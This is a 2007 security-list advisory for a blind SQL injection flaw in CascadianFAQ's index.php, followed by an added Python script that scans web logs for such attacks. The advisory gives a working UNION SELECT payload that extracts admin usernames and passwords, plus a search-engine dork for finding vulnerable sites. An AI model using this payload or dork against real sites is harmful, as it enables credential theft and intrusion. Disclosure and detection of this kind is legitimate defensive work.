Computer Security
[EN] securityvulns.ru
From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 30.01.2007
Subject: CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

*******************************************************************************
# Title   :  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://eclectic-designs.com
# $$      :  Free
# Dork    :  This FAQ is powered by CascadianFAQ
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+&btnG=Google%27da+Ara&meta=


*******************************************************************************

[[SQL]]---------------------------------------------------------

http://[target]/[path]//index.php?catid=[SQL]

Example:

//index.php?catid=-1%20union%20select%20concat(char(85),
char(115),char(101),char(114),char(110),
char(97),char(109),char(101),char(58),username,
char(32),char(124),char(124),char(32),
char(80),char(97),char(115),char(115),
char(119),char(111),char(114),char(100),
char(58),password),
2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*


[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# I'm not a hacker!
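
Added example for defenders (not part of the advisory above, and not code from CascadianFAQ or SecurityVulns): a log check that flags requests to index.php whose catid parameter is not a plain integer, and records which markers from the advisory's example request it carries. The log format, the /faq/ path and the function names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (not real traffic); documentation IP ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jan/2007:10:00:01 +0000] "GET /faq/index.php?catid=3 HTTP/1.1" 200 5120
198.51.100.7 - - [30/Jan/2007:10:00:05 +0000] "GET /faq//index.php?catid=-1%20union%20select%20concat(char(85),username),2%20from%20cfaq_admin/* HTTP/1.1" 200 812
192.0.2.44 - - [30/Jan/2007:10:00:09 +0000] "GET /faq/index.php?catid=12&page=2 HTTP/1.1" 200 4987
203.0.113.5 - - [30/Jan/2007:10:00:12 +0000] "GET /faq/index.php?catid=1%27 HTTP/1.1" 500 310
"""

# Assumed log layout: client address first, request line in double quotes.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Markers visible in the advisory's example request.
MARKERS = {
    "union-select": re.compile(r"union\s+(all\s+)?select", re.I),
    "char-encoding": re.compile(r"\b(char|concat)\s*\(", re.I),
    "admin-table": re.compile(r"cfaq_admin", re.I),
    "sql-comment": re.compile(r"/\*|--|#"),
}

def inspect_line(line):
    """Return (client, catid, reasons) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    # Split by hand: urlsplit() would read a leading "//" as a host name.
    path, _, query = target.partition("?")
    if not path.lower().endswith("index.php"):
        return None
    # parse_qs percent-decodes values, so %20 and %27 are seen as ' ' and "'".
    for value in parse_qs(query, keep_blank_values=True).get("catid", []):
        if re.fullmatch(r"\d{1,10}", value):
            continue  # a category id is expected to be a plain integer
        reasons = ["non-numeric"]
        reasons += [name for name, rx in MARKERS.items() if rx.search(value)]
        return client, value, reasons
    return None

def scan(log_text):
    """Inspect every line and return the list of hits in log order."""
    return [hit for hit in map(inspect_line, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, value, reasons in scan(SAMPLE_LOG):
        print(f"{client} catid={value!r} -> {', '.join(reasons)}")
```

The integer test is the primary signal; the markers only help triage, since a request can be malicious without matching any of them.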

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


